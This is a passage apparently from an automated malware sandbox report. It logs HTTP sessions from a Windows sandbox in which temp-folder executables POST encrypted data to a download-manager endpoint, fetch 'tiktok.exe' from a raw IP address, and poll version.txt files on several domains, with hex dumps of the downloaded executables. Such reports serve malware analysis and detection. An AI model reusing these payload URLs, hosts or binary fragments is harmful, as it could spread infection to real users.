00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 4a 00 00 00 00 00 00 0c 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 Data Ascii: MZP@!L!This program must be run under Win32$7PELX5P`55@J`J@7N<J0(08 878.texth55 `.itext<=5>5 `.dataV5X5@.bssm@7 7.idataN7P 7@.didata8p7@.tls@8z7.rdata 8z7@@.reloc08\|7@B.rsrc<<@@JJ@@@Boole
Apr 26, 2024 17:11:22.079495907 CEST	1289	IN	Data Raw: 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00 00 34 10 40 00 02 08 41 6e 73 69 43 68 61 72 01 00 00 00 00 ff 00 00 00 02 00 00 00 00 50 10 40 00 09 04 43 68 61 72 03 00 00 00 00 ff ff Data Ascii: an@FalseTrueSystem4@AnsiCharP@Charh@ShortInt@SmallInt@Integer@Byte@Word@Pointer@
Apr 26, 2024 17:11:22.079554081 CEST	1289	IN	Data Raw: 74 72 69 65 73 02 00 02 00 00 00 00 24 15 40 00 0e 07 54 4d 65 74 68 6f 64 08 00 00 00 00 00 00 00 00 02 00 00 00 e4 10 40 00 00 00 00 00 02 04 43 6f 64 65 02 00 e4 10 40 00 04 00 00 00 02 04 44 61 74 61 02 00 02 00 06 00 0b 94 7f 40 00 0c 26 6f Data Ascii: tries$@TMethod@Code@Data@&op_Equality@ @Left @Right@&op_Inequality@ @Left @Right@&op_GreaterThan@ @Left @Right@&o
Apr 26, 2024 17:11:22.079570055 CEST	1289	IN	Data Raw: 73 73 02 00 02 00 3b 00 20 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 65 73 73 03 00 e4 10 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 e4 11 40 00 01 00 04 4e 61 6d 65 02 00 02 00 3b 00 a4 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 Data Ascii: ss; @MethodAddress@Self@Name;@MethodAddress@Self@NameF@MethodName@Self@Address@@=L~@QualifiedClassName@Self@
Apr 26, 2024 17:11:22.079582930 CEST	1289	IN	Data Raw: 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 50 1f 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 18 1f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65 Data Ascii: ceFSystemP@IEnumerable@System@IDispatch@FSystemD$UD$sD$@@@F@@\ @@<!@\
Apr 26, 2024 17:11:22.079603910 CEST	1289	IN	Data Raw: 40 00 01 00 00 00 00 02 00 3c 24 40 00 14 09 50 56 61 72 41 72 72 61 79 50 24 40 00 02 00 00 00 00 54 24 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 cc Data Ascii: @<$@PVarArrayP$@T$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data$@Bounds$@TVarRecord@PRecord@RecI
Apr 26, 2024 17:11:22.079653025 CEST	1289	IN	Data Raw: 41 00 f4 ff 24 2c 40 00 43 00 f4 ff 5a 2c 40 00 43 00 f4 ff a5 2c 40 00 43 00 f4 ff d9 2c 40 00 43 00 f4 ff 3b 2d 40 00 43 00 f4 ff 9d 2d 40 00 43 00 f4 ff ff 2d 40 00 43 00 f4 ff 61 2e 40 00 43 00 f4 ff c3 2e 40 00 43 00 f4 ff 25 2f 40 00 43 00 Data Ascii: A$,@CZ,@C,@C,@C;-@C-@C-@Ca.@C.@C%/@C/@C/@CK0@C0@C1@Cq1@C1@C52@C2@C2@C;3@C~3@C3@C4@CE4@C4@C4@C=5@C5@C5@C
Apr 26, 2024 17:11:22.079694033 CEST	1289	IN	Data Raw: 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 30 e4 40 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 d0 41 40 00 01 00 03 53 72 63 02 00 00 9c 10 Data Ascii: StartIndex@Countb0@CopySelfA@Src@StartIndex'@Dest@Countb@CopySelf'@SrcA@Dest@StartIndex@Countb@Copy
Apr 26, 2024 17:11:22.079710960 CEST	1289	IN	Data Raw: 36 03 00 80 10 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 00 54 11 40 00 02 00 03 4f 66 73 02 00 02 00 43 00 d4 e8 40 00 09 52 65 61 64 49 6e 74 33 32 03 00 9c 10 40 00 08 00 03 00 00 00 00 00 Data Ascii: 6@Self'@PtrT@OfsC@ReadInt32@Self'@PtrT@OfsC@ReadInt64@Self'@PtrT@OfsA@ReadPtr'@Self'@PtrT@
Apr 26, 2024 17:11:22.079725981 CEST	1289	IN	Data Raw: 00 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 05 56 61 6c 75 65 02 00 02 00 3e 00 78 ea 40 00 11 41 6c 6c 6f 63 53 74 72 69 6e 67 41 73 41 6e 73 69 03 00 9c 27 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00 Data Ascii: SelfValue>x@AllocStringAsAnsi'@Self@StrP@AllocStringAsAnsi'@Self@Str@CodePageA@AllocStringAsUnicode'@Self@Str<l@A
Apr 26, 2024 17:11:22.319286108 CEST	1289	IN	Data Raw: 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 02 b8 12 40 00 02 00 05 56 61 6c 75 65 02 00 00 9c 10 40 00 0c 00 0f 4d 61 78 43 68 61 72 73 49 6e 63 4e 75 6c 6c 02 00 00 cc 10 40 00 08 00 08 43 6f 64 65 50 61 67 65 Data Ascii: Self'@Ptr@Value@MaxCharsIncNull@CodePages@WriteStringAsAnsiSelf'@PtrT@Ofs@Value@MaxCharsIncNull@WriteStringAsAnsiS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49737	20.157.87.45	80	6972	C:\Users\user\AppData\Local\Temp\u2xs.3.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:11:32.997065067 CEST	266	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library)
Apr 26, 2024 17:11:33.238429070 CEST	300	OUT	Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6f 58 70 79 6d 68 5a 4b 6f 47 4f 76 4a 32 75 58 54 55 46 32 2b 30 66 46 76 61 45 49 51 2b 2f 6c 33 6e 69 78 46 78 62 4d 79 2b 36 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 Data Ascii: /eZBs+BlQFXq0YdKO1rWGoXpymhZKoGOvJ2uXTUF2+0fFvaEIQ+/l3nixFxbMy+62osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
Apr 26, 2024 17:11:33.479969978 CEST	469	IN	HTTP/1.1 200 OK cache-control: private content-length: 256 content-type: text/html; charset=utf-8 x-whom: Ioloweb7 date: Fri, 26 Apr 2024 15:11:32 GMT set-cookie: SERVERID=svc7; path=/ connection: close Data Raw: 31 33 32 62 68 5a 33 4d 56 38 47 36 64 71 53 38 4c 68 46 6d 33 71 59 50 6f 4a 44 73 46 59 47 5a 70 75 54 32 2b 37 36 66 6f 6e 75 4b 30 71 57 64 75 67 30 6b 30 70 75 48 51 4a 2f 66 61 70 67 77 74 64 4f 58 51 72 79 6c 55 6c 2f 68 70 6c 34 34 77 75 67 69 4f 32 2f 4b 6d 7a 6f 53 4c 72 54 45 55 6f 48 62 4d 42 42 67 31 47 54 69 4e 4e 32 63 6d 75 6d 50 77 44 71 31 6d 6a 77 55 37 4e 53 74 5a 6b 6c 61 2b 58 79 47 77 54 6e 78 65 43 69 2b 4e 4d 45 63 47 70 31 32 65 33 6f 70 53 41 39 50 4a 46 62 53 5a 36 38 53 45 41 4c 54 76 7a 4f 7a 30 53 30 42 6a 6f 4c 65 42 30 6a 63 5a 36 45 54 63 6f 77 4e 31 2f 58 32 4b 70 7a 78 31 48 54 4c 69 70 4b 4b 76 30 54 52 58 32 6b 49 67 44 35 52 30 6c 4d 6b 61 4c 6b 6c 6d 7a 6c 6f 54 64 4c 47 7a 35 6c 79 45 65 4a 6e 66 79 53 76 79 4d 66 32 Data Ascii: 132bhZ3MV8G6dqS8LhFm3qYPoJDsFYGZpuT2+76fonuK0qWdug0k0puHQJ/fapgwtdOXQrylUl/hpl44wugiO2/KmzoSLrTEUoHbMBBg1GTiNN2cmumPwDq1mjwU7NStZkla+XyGwTnxeCi+NMEcGp12e3opSA9PJFbSZ68SEALTvzOz0S0BjoLeB0jcZ6ETcowN1/X2Kpzx1HTLipKKv0TRX2kIgD5R0lMkaLklmzloTdLGz5lyEeJnfySvyMf2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49754	20.157.87.45	80	6972	C:\Users\user\AppData\Local\Temp\u2xs.3.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:11:55.135184050 CEST	266	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library)
Apr 26, 2024 17:11:55.378070116 CEST	300	OUT	Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6f 58 70 79 6d 68 5a 4b 6f 47 4f 76 4a 32 75 58 54 55 46 32 2b 30 74 69 53 56 57 6f 48 52 30 44 67 2b 47 4d 38 61 53 79 38 54 4c 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 Data Ascii: /eZBs+BlQFXq0YdKO1rWGoXpymhZKoGOvJ2uXTUF2+0tiSVWoHR0Dg+GM8aSy8TL2osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
Apr 26, 2024 17:11:55.779341936 CEST	405	IN	HTTP/1.1 200 OK cache-control: private content-length: 192 content-type: text/html; charset=utf-8 x-whom: Ioloweb5 date: Fri, 26 Apr 2024 15:11:55 GMT set-cookie: SERVERID=svc5; path=/ connection: close Data Raw: 39 76 37 59 43 62 54 6a 68 53 4f 54 65 7a 71 52 74 42 41 38 44 61 46 35 46 43 52 49 72 4c 62 32 49 6c 78 6c 34 38 6a 4b 61 69 32 6d 65 6d 45 6e 73 33 69 48 76 54 35 4c 2b 48 33 43 49 6c 49 68 4f 6f 33 44 5a 35 33 6d 6c 6a 61 38 4b 42 32 59 45 49 73 2f 6a 31 50 54 39 36 78 49 73 73 61 66 69 37 62 44 69 4d 64 6b 2f 49 41 58 37 55 4a 75 55 59 31 35 61 38 31 67 4d 75 75 46 5a 4c 41 54 67 2b 42 39 62 35 69 4b 57 33 77 6f 49 4f 50 6c 6f 49 59 4a 45 65 78 30 33 62 6f 4c 51 68 4f 49 70 2b 4f 45 77 34 6a 52 4c 48 75 52 75 35 62 44 2b 34 61 49 49 42 63 42 43 43 69 6d 2b 6b 4e 53 Data Ascii: 9v7YCbTjhSOTezqRtBA8DaF5FCRIrLb2Ilxl48jKai2memEns3iHvT5L+H3CIlIhOo3DZ53mlja8KB2YEIs/j1PT96xIssafi7bDiMdk/IAX7UJuUY15a81gMuuFZLATg+B9b5iKW3woIOPloIYJEex03boLQhOIp+OEw4jRLHuRu5bD+4aIIBcBCCim+kNS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49763	185.172.128.203	80	5788	C:\Users\user\AppData\Local\Temp\u2xs.0.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:12:19.399468899 CEST	76	OUT	GET /tiktok.exe HTTP/1.1 Host: 185.172.128.203 Cache-Control: no-cache
Apr 26, 2024 17:12:19.641654968 CEST	1289	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 15:12:19 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 24 Apr 2024 21:15:46 GMT ETag: "85400-616de2c892480" Accept-Ranges: bytes Content-Length: 545792 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 60 bc 47 00 e8 ab 56 05 00 68 ff be Data Ascii: MZ@!L!This program cannot be run in DOS mode.$c'i'i'i[7iYiX8i73i7i7i.9"i'i}i7%i7U&i'i=&i7&iRich'iPELv)f@@P(@( lp @.text1 `.rdata@@.data@ @.gfids@@.rsrc@(*@@.relocl @B`GVh
Apr 26, 2024 17:12:19.641670942 CEST	1289	IN	Data Raw: 46 00 e8 1c 73 05 00 59 c3 68 09 bf 46 00 e8 10 73 05 00 59 c3 68 13 bf 46 00 e8 04 73 05 00 59 c3 68 1d bf 46 00 e8 f8 72 05 00 59 c3 b9 a0 bd 47 00 e8 71 56 05 00 68 27 bf 46 00 e8 e2 72 05 00 59 c3 55 8b ec 83 ec 0c a1 6c b0 47 00 33 c5 89 45 Data Ascii: FsYhFsYhFsYhFrYGqVh'FrYUlG3EUEVUNEQWFPfyM3^{k]UVWFPFfEPy^]IpvGEUVFFPyEtj
Apr 26, 2024 17:12:19.641709089 CEST	1289	IN	Data Raw: 3e 00 75 64 6a 18 e8 06 69 05 00 8b f8 83 c4 04 89 7d 08 8b 4d 0c c7 45 fc 00 00 00 00 8b 51 04 85 d2 75 07 b9 a0 76 47 00 eb 0a 8b 4a 18 85 c9 75 03 8d 4a 1c 51 8d 4d ac e8 dc fb ff ff 8d 45 e0 c7 47 04 00 00 00 00 50 c7 07 58 c7 46 00 e8 90 58 Data Ascii: >udji}MEQuvGJuJQMEGPXFXMG>MdY_^]UAPEPX]US]3Vu+W3;uGtAEPPyXGEF;u_^[]
Apr 26, 2024 17:12:19.641725063 CEST	1289	IN	Data Raw: 01 8a 08 40 84 c9 75 f9 2b c2 3b f0 72 e3 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 53 8b dc 83 ec 08 83 e4 f8 83 c4 04 55 8b 6b 04 89 6c 24 04 8b ec 6a ff 68 55 ba 46 00 64 a1 00 00 00 00 50 53 81 ec 80 00 00 00 a1 6c b0 47 00 33 Data Ascii: @u+;r_^]SUkl$jhUFdPSlG3EVWPEd(~GGG0G)88z(\|G G4G`%Z/8G,QWEhGMEE~r>?u3QAu+QjEP
Apr 26, 2024 17:12:19.641855001 CEST	1289	IN	Data Raw: 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d c4 33 d2 e8 33 f8 ff ff c7 45 c4 00 00 00 00 c6 45 fc 0c 8b 4d d4 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 45 d8 85 c0 74 12 f0 0f c1 70 20 4e 75 0a 8b 4d d8 33 d2 e8 f3 Data Ascii: tA uM33EEMt@tjEtp NuM3EEMt@tj(p}GGGG31zG`%Z/GQWEhGMEE~r>?u3
Apr 26, 2024 17:12:19.641869068 CEST	1289	IN	Data Raw: 3b f3 ff ff c7 45 88 00 00 00 00 c6 45 fc 1c 8b 4d 98 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 4d 9c 85 c9 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d 9c 33 d2 e8 fa f2 ff ff c7 45 9c 00 00 00 00 c6 45 fc 1d 8b 4d Data Ascii: ;EEMt@tjMtA uM3EEMt@tjMtA uM3EEMt@tjMtA uM3xEEMt@tjE
Apr 26, 2024 17:12:19.641880989 CEST	1289	IN	Data Raw: 0f 00 00 00 c7 41 10 00 00 00 00 50 c6 01 00 e8 62 05 00 00 e8 cd 32 05 00 83 c4 18 83 7c 24 1c 00 76 57 ff 15 cc c9 47 00 8b 44 24 1c 40 50 6a 02 ff 15 c0 c9 47 00 8b f0 85 f6 74 3d 83 7c 24 20 10 8d 54 24 0c 8b 4c 24 1c 0f 43 54 24 0c 41 51 52 Data Ascii: APb2\|$vWGD$@PjGt=\|$ T$L$CT$AQRVGPGVGVjGVGD$ r@L$Pt$D$ D$D$\|$8D$$D$4CD$$GhG6'@'@#(@(@)@)@
Apr 26, 2024 17:12:19.641921043 CEST	1289	IN	Data Raw: 10 89 7e 10 72 0e 8b 06 5f c6 00 00 8b c6 5e 5b 5d c2 08 00 8b c6 5f 5e 5b c6 00 00 5d c2 08 00 8b c6 85 ff 74 0b 57 53 50 e8 5f 71 05 00 83 c4 0c 83 7e 14 10 89 7e 10 72 0f 8b 06 c6 04 38 00 8b c6 5f 5e 5b 5d c2 08 00 8b c6 c6 04 38 00 5f 8b c6 Data Ascii: ~r_^[]_^[]tWSP_q~~r8_^[]8_^[]hvG>US]VMWC;}+;G;uG99FF~rQj_^[]Qj_^[]9~s$vW
Apr 26, 2024 17:12:19.641947985 CEST	1289	IN	Data Raw: 3b 46 10 76 04 85 c0 75 9b 8b 4e 10 3b c1 77 19 89 46 10 83 7e 14 10 72 08 8b 0e c6 04 01 00 eb 14 8b ce c6 04 01 00 eb 0c 2b c1 8b ce 6a 00 50 e8 ff fd ff ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc Data Ascii: ;FvuN;wF~r+jPMdY_^[]UAPuuuu;y]3]UjhpFdPSVWlG3PEdeuEv'^;v<+
Apr 26, 2024 17:12:19.641992092 CEST	1289	IN	Data Raw: e8 99 30 05 00 83 c4 04 8d 4d e4 e8 d5 2e 05 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d ec 33 cd e8 93 43 05 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b f1 0f 57 c0 8d 46 04 50 c7 06 ac c1 46 00 66 0f d6 00 Data Ascii: 0M.MdY_^[M3C]UVWFPFfEPQLF^]VNt$F+PQFFF^Vt#F+PQFF^UjhFdPPVWl
Apr 26, 2024 17:12:19.883325100 CEST	1289	IN	Data Raw: c7 00 00 00 00 00 6a 01 8b 01 ff 10 85 f6 75 e9 6a 00 6a 00 c7 47 24 00 00 00 00 e8 9c 6b 05 00 cc cc 56 8b f1 8b 4e 40 85 c9 74 24 8b 46 48 2b c1 c1 f8 03 50 51 e8 b7 03 00 00 c7 46 40 00 00 00 00 c7 46 44 00 00 00 00 c7 46 48 00 00 00 00 8b 4e Data Ascii: jujjG$kVN@t$FH+PQF@FDFHN4t$F<+PQF4F8F<N$t$F,+PQF$F(F,Nt$F+PQ6FFFNt$F+PQFF

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.5	49766	185.22.66.15	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:12:30.805923939 CEST	382	OUT	GET /updates/yd/wrtzr_yt_a_1/win/version.txt?TgRwmotRmvjanFwrAygiXReOJytNrSTXT HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: www.rapidfilestorage.com Connection: Keep-Alive
Apr 26, 2024 17:12:31.135520935 CEST	383	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Apr 2024 15:12:30 GMT Content-Type: text/plain Content-Length: 10 Connection: keep-alive Set-Cookie: slb_route=53cbd94bd254a28a3e76d367ee86d88e; Path=/; Secure; HttpOnly Last-Modified: Fri, 05 Apr 2024 02:56:30 GMT ETag: "660f685e-a" Accept-Ranges: bytes X-Resolver-IP: 185.22.66.15 X-Resolver-IP: 185.22.66.15 Data Raw: 32 2e 30 2e 30 2e 33 31 33 33 Data Ascii: 2.0.0.3133

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.5	49767	194.67.87.38	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:12:31.977682114 CEST	374	OUT	GET /updates/yd/wrtzr_yt_a_1/win/version.txt?QBydZwkpsFKAFvVdHIWuWCRJuDNJzwnPw HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: helsinki-dtc.com Connection: Keep-Alive
Apr 26, 2024 17:12:32.250626087 CEST	264	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 15:12:31 GMT Content-Type: text/plain Content-Length: 10 Last-Modified: Fri, 05 Apr 2024 03:22:15 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "660f6e67-a" Accept-Ranges: bytes Data Raw: 32 2e 30 2e 30 2e 33 31 33 33 Data Ascii: 2.0.0.3133

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.5	49772	13.32.87.38	80

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 17:12:32.532732964 CEST	386	OUT	GET /updates/yd/wrtzr_yt_a_1/win/version.txt?iTfjhKmMUWxsWdQYLjvpBrapSwfuaDFGe HTTP/1.1 Accept: / Cache-Control: no-cache Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: skrptfiles.tracemonitors.com Connection: Keep-Alive
